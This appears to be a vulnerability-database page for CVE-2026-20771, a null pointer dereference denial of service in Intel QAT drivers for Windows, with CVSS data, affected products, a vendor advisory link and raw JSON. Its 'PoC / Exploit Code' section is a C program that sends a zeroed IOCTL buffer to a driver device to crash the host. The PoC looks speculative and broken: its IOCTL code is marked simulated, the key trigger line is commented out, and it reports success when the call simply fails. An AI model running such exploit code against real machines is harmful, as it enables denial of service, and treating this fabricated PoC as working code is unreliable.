Security Vulnerability Report
CVE-2026-20771 CVSS 6.1 MEDIUM

CVE-2026-20771

Published: 2026-05-12 17:16:18
Last Modified: 2026-05-15 20:04:13

Description

Null pointer dereference for some Intel(R) QAT software drivers for Windows before version 1.13 within Ring 3: User Applications may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (low), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:* - VULNERABLE
Intel(R) QAT software drivers for Windows < 1.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Simulated IOCTL code for the vulnerable function
#define VULNERABLE_IOCTL 0x222003

int main() {
    // Attempt to open the device handle
    HANDLE hDevice = CreateFileA("\\\\.\\IntelQATDevice",
                                 GENERIC_READ | GENERIC_WRITE,
                                 0, NULL, OPEN_EXISTING,
                                 FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device. Error: %lu\n", GetLastError());
        return 1;
    }

    // Prepare input buffer simulating the null pointer dereference trigger
    // The vulnerable driver expects a valid pointer but receives NULL/invalid data
    BYTE inBuffer[1024];
    memset(inBuffer, 0, sizeof(inBuffer));

    // Manipulate buffer to pass NULL pointer equivalent to the driver
    // Offset depends on specific driver structure
    // *(DWORD*)(inBuffer + 0x10) = 0;

    DWORD bytesReturned;
    BOOL result = DeviceIoControl(
        hDevice,
        VULNERABLE_IOCTL,
        inBuffer, sizeof(inBuffer), // Input buffer
        NULL, 0,                    // Output buffer
        &bytesReturned,
        NULL
    );

    if (!result) {
        printf("Exploit triggered! DeviceIoControl failed with error: %lu\n", GetLastError());
        // Expected behavior: System crash or BSOD due to null pointer dereference
    } else {
        printf("Call succeeded, vulnerability not triggered.\n");
    }

    CloseHandle(hDevice);
    return 0;
}

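References

https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01387.html (Patch, Vendor Advisory)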

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20771", "sourceIdentifier": "[email protected]", "published": "2026-05-12T17:16:18.060", "lastModified": "2026-05-15T20:04:13.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference for some Intel(R) QAT software drivers for Windows before version 1.13 within Ring 3: User Applications may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (low), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:*", "versionEndExcluding": "1.13.0-0021", "matchCriteriaId": "33320669-6E22-4E76-988F-0FD0E3184A80"}]}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01387.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}